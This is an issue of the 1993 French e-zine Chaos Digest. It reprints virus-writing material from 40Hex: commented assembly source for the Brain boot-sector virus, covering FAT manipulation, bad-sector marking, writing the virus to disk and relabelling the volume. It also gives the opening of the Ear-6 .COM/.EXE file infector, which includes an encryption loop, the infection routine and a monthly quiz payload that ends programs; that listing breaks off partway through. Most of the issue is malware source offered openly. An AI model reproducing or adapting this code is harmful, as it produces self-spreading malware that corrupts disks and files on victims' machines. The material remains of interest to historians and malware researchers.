Chaos Digest Samedi 3 Juillet 1993 Volume 1 : Numero 70 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.70 (3 Juillet 1993) File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #008(2)-009(1) (reprint) FATManip: ;returns al as error code jmp short delvedeeper nop FATManipreadcounter dw 3 db ' (c) 1986 Brain & Amjads (pvt) Ltd' delvedeeper: call readFAT ;Get FAT ID byte mov ax,word ptr ds:[offset readbuffer] cmp ax,0FFFDh ;is it 360K disk? je is360Kdisk ;continue if so mov al,3 ;al=3 == not good disk stc ;flag error retn ;and exit is360Kdisk: mov cx,37h mov FATManipreadcounter,0 ;none found yet checknextsector: call FATentry12bit ;get entry in FAT cmp ax,0 ;unused? jne notunused inc FATManipreadcounter ;one more found unused cmp FATManipreadcounter,3 ;If need more, jne tryanother ; go there jmp short markembad ;found 3 consecutive nop ;empty sectors notunused: mov FATManipreadcounter,0 ;must start over tryanother: inc cx ;try next sector cmp cx,163h ;end of disk? jne checknextsector ;if not, continue mov al,1 ;al=1 == none empty stc ;Indicate error retn markembad: mov dl,3 ;3 times markanotherbad: call markbad12bit dec cx dec dl jnz markanotherbad inc cx call calc1sttrack call writeFAT ;update FAT mov al,0 ;al=0 == ok clc ;indicate success retn markbad12bit: push cx push dx mov si,offset readbuffer ;si -> buffer mov al,cl shr al,1 jc low_12 ;low bits call clus2offset12bit mov ax,[bx+si] ;get FAT entry and ax,0F000h ;mark it bad or ax,0FF7h jmp short putitback ;and put it back nop low_12: call clus2offset12bit mov ax,[bx+si] ;get FAT entry and ax,0Fh ;mark it bad or ax,0FF70h putitback: mov [bx+si],ax ;replace FAT entry mov word ptr ds:[400h][bx+si],ax ;in two places pop dx pop cx retn FATentry12bit: push cx mov si,offset readbuffer ;si->buffer mov al,cl shr al,1 ;Part 3 of the virus starts here jc want_high_12 call clus2offset12bit mov ax,[bx+si] and ax,0FFFh jmp short exitFATentry12bit nop want_high_12: call clus2offset12bit ;xxxxxxxxxxxx0000 mov ax,[bx+si] ;^^^^^^^^^^^^wanted and ax,0FFF0h ;mask wanted bits mov cl,4 ;and move to correct shr ax,cl ;position exitFATentry12bit: pop cx retn clus2offset12bit: push dx mov ax,3 mul cx shr ax,1 ;ax = cx*1.5 mov bx,ax pop dx retn readFAT: mov ah,2 ;read call FAT_IO retn writeFAT: mov ah,3 ;write call FAT_IO retn FAT_IO: mov cx,4 ;try four times FAT_IOLoop: push cx push ax mov ah,0 ;reset disk int 6Dh ;int 13h pop ax jc tryFAT_IOagain mov bx,offset readbuffer mov al,4 ;4 sectors mov dh,0 ;head 0 mov dl,curdrive mov cx,2 ;sector 2 push ax ;(FAT) int 6Dh ;int 13h pop ax jnc exitFAT_IO tryFAT_IOagain: pop cx loop FAT_IOLoop pop ax pop ax mov al,2 stc ;mark error retn exitFAT_IO: pop cx retn calc1sttrack: push cx sub cx,2 shl cx,1 ;2 sectors/cluster add cx,0Ch ;start of data area mov ax,cx ;ax = sector mov cl,12h ;4096 div cl ;ax/4096 = al rem ah mov byte ptr firstsector+1,al mov firsthead,0 inc ah cmp ah,9 ;past track 9? jbe notpasttrack9 ;nope, we are ok sub ah,9 ;otherwise, adjust mov firsthead,1 notpasttrack9: mov byte ptr firstsector,ah pop cx retn db 0, 0, 0, 0, 0, 0 r_or_w_root db 3 entrycount dw 35h tempsave1 dw 303h tempsave2 dw 0EBEh tempsave3 dw 1 tempsave4 dw 100h db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh db 8Dh, 98h, 9Fh, 8Eh,0E0h db ' (c) ashar $' changeroot: call readroot ;read in root directory jc donotchangeroot push di call changevolume ;change volume label pop di jc donotchangeroot call writeroot ;write back new root dir donotchangeroot: retn ;The following is just garbage bytes db 0BBh, 9Bh, 04h,0B9h, 0Bh db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h db 0C6h, 06h changevolume: mov entrycount,6Ch mov si,offset readbuffer+40h;3nd dir entry mov tempsave1,dx mov ax,entrycount ;6Ch shr ax,1 mov tempsave3,ax ;36h shr ax,1 mov tempsave2,ax ;1Bh xchg ax,cx and cl,43h ;cx = 3 mov di,tempsave2 add di,1E3h ;di = 01FE findlabel: mov al,[si] cmp al,0 je dolabel ;no mo entries mov al,[si+0Bh] ;attribute byte and al,8 ;volume label? cmp al,8 ;yes? je dolabel ;then change it! add si,20h ;go to next directory entry dec entrycount jnz findlabel ;loop back stc ;Error! retn db 8Bh dolabel: mov bx,[di] ;offset a_data xor bx,tempsave3 ;bx = 53Ah mov tempsave3,si ;si->direntry cli mov ax,ss mov tempsave1,ax mov tempsave2,sp mov ax,cs mov ss,ax mov sp,tempsave3 add sp,0Ch ;->reserved area mov cl,51h add dx,444Ch mov di,2555h mov cx,0C03h repe cmpsw mov ax,0B46h mov cx,3 rol ax,cl ;ax = 5A30h mov tempsave3,ax mov cx,5 mov dx,8 sub tempsave3,5210h ;820h push tempsave3 ;store attributes/reserved ;I haven't commented the remainder of this procedure. ;It basically changes the volume label to read "(c) Brain" ;Comment mode OFF dowhatever: mov ah,[bx] ;5a3h inc bx mov dl,ah shl dl,1 jc dowhatever searchstuff: mov dl,[bx] ;dl=C2h inc bx ;bx=53Eh mov al,dl shl dl,1 jc searchstuff add ax,1D1Dh push ax inc tempsave3 db 73h, 01h ;jnc $+3 db 0EAh,0E2h,0E1h, 8Bh, 26h;jmp 268B:E1E2 xchg bp,ax add al,0A1h xchg bx,ax add al,8Eh sar bl,1 add dh,[bp+si] clc ret ;db 95h, 04h,0A1h, 93h, 04h, 8Eh ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h ;Comment mode ON readroot: mov r_or_w_root,2 ;set action code jmp short do_rw_root ;easier to do w/ nop ;mov ah, 2 writeroot: mov r_or_w_root,3 jmp short do_rw_root ;this is somewhat useless nop do_rw_root: mov dh,0 ;head 0 mov dl,curdrive mov cx,6 ;sector 6 mov ah,r_or_w_root mov al,4 ;4 sectors mov bx,offset readbuffer call doint13h jc exit_rw_root ;quit on error mov cx,1 mov dh,1 ;head 1 mov ah,r_or_w_root mov al,3 add bx,800h call doint13h exit_rw_root: retn doint13h: mov tempsave1,ax mov tempsave2,bx mov tempsave3,cx mov tempsave4,dx mov cx,4 doint13hloop: push cx mov ah,0 ;Reset disk int 6Dh jc errordoingint13h mov ax,tempsave1 mov bx,tempsave2 mov cx,tempsave3 mov dx,tempsave4 int 6Dh ;int 13h jnc int13hsuccess errordoingint13h: pop cx loop doint13hloop stc ;indicate error retn int13hsuccess: pop cx retn db 0, 0, 0 ;Part 4 of the virus starts here tempstorecx dw 3 readwritecurrentdata dw 301h writevirus: call FATManip jc exitwritevirus mov cursector,1 mov curhead,0 mov bx,offset readbuffer call readcurrent mov bx,offset readbuffer mov ax,firstsector mov cursector,ax mov ah,firsthead mov curhead,ah call writecurrent call calcnextsector mov cx,5 mov bx,200h writeanothersector: mov tempstorecx,cx call writecurrent call calcnextsector add bx,200h mov cx,tempstorecx loop writeanothersector mov curhead,0 mov cursector,1 mov bx,0 call writecurrent clc ;indicate success exitwritevirus: retn readcurrent: mov readwritecurrentdata,201h jmp short doreadwrite nop writecurrent: mov readwritecurrentdata,301h jmp short doreadwrite ;This is pointless. nop doreadwrite: push bx mov cx,4 tryreadwriteagain: push cx mov dh,curhead mov dl,curdrive mov cx,cursector mov ax,readwritecurrentdata ;read or write? int 6Dh ;int 13h jnc readwritesuccessful mov ah,0 ;reset disk int 6Dh ;int 13h pop cx loop tryreadwriteagain pop bx pop bx stc ;Indicate error retn readwritesuccessful: pop cx pop bx retn calcnextsector: inc byte ptr cursector ;next sector cmp byte ptr cursector,0Ah jne donecalculate ;finished calculations mov byte ptr cursector,1 ;clear sector # inc curhead ;and go to next head cmp curhead,2 ;if not too large, jne donecalculate ;we are done mov curhead,0 ;otherwise clear head # inc byte ptr cursector+1 ;and advance cylinder donecalculate: retn db 64h, 74h, 61h ;read buffer starts here ;insert your favorite boot block below... readbuffer: brain ends end +++++ 40Hex Number 8 Volume 2 Issue 4 File 009 -=PHALCON/SKISM=- Ear-6 Virus The Ear-6 is a parasitic, non-resident, .COM & .EXE infector. It infects 5 files everytime it is run. It will traverse towards the root directory if fewer than 5 files are found. We have no clue as to what the 'AUX error' that Patti talks about. But then again, Patti isn't sure as to who she is, let alone an accurate discription on one of our virii. On activation (1st of any month), it plays ear quiz with victim. Failure to answer the question will result in program termination. -) Gheap --------------------------------------------------------------------------- ;[Ear-6] ;El virus de oreja y oido seis ;Fue escrito por Dark Angel de PHALCON/SKISM ;Yo (el angel oscuro) escribi este programa hace muchas semanas. ;No deba modificar este programa y da a otras personas COMO SI ;estara el suyo. ;?Donde esta mi llama, mama? ; diccionarito ;espanol ingles magnitud size ;abre open mango handle ;aprueba pass (a test) mascara mask ;atras back mensaje message ;azado random mes month ;busca find monton heap ;cierra close oreja, oido ear ;cifra code, encrypt, decrypt pila stack ;codo pointer pregunta question ;corto terse, short primer first ;empieza begin remendar patch ;escriba write renuncia reject ;espanol ingles respuesta answer ;fecha date salta exit ;ficha file siguiente following, next ;indice table suspende fail (a test) ;?le gusta? do you like? termina end ;longitud length virus virus (!) .model tiny .code org 100h longitud_del_virus = TerminaVir - EmpezarVir longitud_del_escribir = offset termina_escribir - offset escribir id = 'GH' ;Representa el lider de ;PHALCON/SKISM, Garbageheap Empezar: db 0e9h, 0, 0 ;jmp EmpezarVir EmpezarVir: shwing: remendar1: mov bx, offset EmpezarCifra remendar2: mov cx, ((longitud_del_virus + 1) / 2) hacia_atras: ;atras db 2eh remendar3: db 81h, 37h, 0, 0 ;xor word ptr cs:[bx], 0 add bx, 2 loop hacia_atras EmpezarCifra: call siguiente ;Es estupido, pero es corto siguiente: pop bp sub bp, offset siguiente mov byte ptr [bp+numinf], 0 cld ;No es necessario, pero ;?por que no? cmp sp, id jz SoyEXE SoyCOM: mov di, 100h push di lea si, [bp+Primer3] movsb jmp short SoyNada SoyEXE: push ds push es push cs push cs pop ds pop es lea di, [bp+EXE_Donde_JMP] ;el CS:IP original de la ficha lea si, [bp+EXE_Donde_JMP2] ;infectada movsw movsw movsw jmp short SoyNada NombreDelVirus db 0,'[Ear-6]',0 ;En ingles, !por supuesto! NombreDelAutor db 'Dark Angel',0 SoyNada: movsw mov ah, 1ah ;Esindicece un DTA nuevo lea dx, [bp+offset nuevoDTA] ;porque no quiere destruir int 21h ;el DTA original mov ax, word ptr [bp+remendar1+1] mov word ptr [bp+tempo], ax mov ah, 47h ;Obtiene el directorio xor dl, dl ;presente lea si, [bp+diroriginal] int 21h looper: lea dx, [bp+offset mascara1] ;"mascara", no "mascara" call infectar_mascara ;pero no es possible usar ;acentos en MASM/TASM. ;!Que lastima! ;mascara1 es '*.EXE',0 lea dx, [bp+offset mascara2] ;mascara2 es '*.COM',0 call infectar_mascara ;infecta las fichas de COM cmp byte ptr [bp+numinf], 5 ;?Ha infectada cinco fichas? jg saltar ;Si es verdad, no necesita ;busca mas fichas. mov ah, 3bh ;Cambia el directorio al lea dx, [bp+puntos] ;directorio anterior int 21h ;('..', 'punto punto') jnc looper saltar: lea dx, [bp+backslash] ;Cambia el directorio al mov ah, 3bh ;directorio terminado. int 21h mov ah, 2ah ;Activa el primer de int 21h ;cada mes cmp dl, 1 ;Si no es el primer, jnz saltarahora ;!saltar ahora! (duh-o) mov ah, 2ch ;?Que hora es? int 21h cmp dl, 85 ;85% probabilidad de jg saltarahora ;activacion and dx, 7 ;Un numero quasi-azado shl dl, 1 ;Usalo para determinar mov bx, bp ;que preguntara la virus add bx, dx mov dx, word ptr [bx+indice] ;indice para el examencito add dx, bp inc dx push dx ;Salva el codo al pregunta mov ah, 9 ;Escriba el primer parte de lea dx, [bp+mensaje] ;la pregunta int 21h pop dx ;Escriba el parte de la oreja int 21h ;o el oido dec dx push dx ;Salva la respuesta correcta lea dx, [bp+secciones] ;Escriba los secciones de la int 21h ;oreja y el oido trataotrarespuesta: mov ah, 7 ;Obtiene la respuesta de la int 21h ;"victima" cmp al, '1' ;Necesita una respuesta de jl trataotrarespuesta ;uno hasta tres cmp al, '3' ;Renuncia otras respuestas jg trataotrarespuesta int 29h ;Escriba la respuesta pop bx ;El codo al respuesta ;correcta mov ah, 9 ;Prepara a escribir un ;mensaje cmp al, byte ptr [bx] ;?Es correcta? jz saltarapidamente ;El aprueba el examencito. ;Pues, salta rapidamente. lea dx, [bp+suspendido] ;Lo siento, pero !Ud. no int 21h ;aprueba el examencito facil! mov ah, 4ch ;Estudie mas y el programa jmp quite ;permitira a Ud a continuar. saltarapidamente: lea dx, [bp+aprueba] int 21h saltarahora: mov ah, 1ah ;Restaura el DTA original mov dx, 80h quite: cmp sp, id - 4 ;?Es EXE o COM? jz vuelvaEXE vuelvaCOM: int 21h ;Restaura el DTA y vuelva retn ;a la ficha original de COM vuelvaEXE: pop es pop ds ;ds -> PSP int 21h mov ax, es add ax, 10h ;Ajusta para el PSP add word ptr cs:[bp+EXE_Donde_JMP+2], ax cli add ax, word ptr cs:[bp+PilaOriginal+2] mov ss, ax mov sp, word ptr cs:[bp+PilaOriginal] sti db 0eah ;JMP FAR PTR SEG:OFF EXE_Donde_JMP dd 0 PilaOriginal dd 0 EXE_Donde_JMP2 dd 0 PilaOriginal2 dd 0 infectar_mascara: mov ah, 4eh ;Busca la ficha primera mov cx, 7 ;Cada atributo brb_brb: int 21h jc hasta_la_vista_bebe ;No la busca xor al, al call abrir ;Abre la ficha mov ah, 3fh mov cx, 1ah lea dx, [bp+buffer] int 21h mov ah, 3eh ;Cierra la ficha int 21h lea si,[bp+nuevoDTA+15h] ;Salva cosas sobre la ficha lea di,[bp+f_atrib] ;Por ejemplo, la fecha de mov cx, 9 ;creacion rep movsb ------------------------------ End of Chaos Digest #1.70 ************************************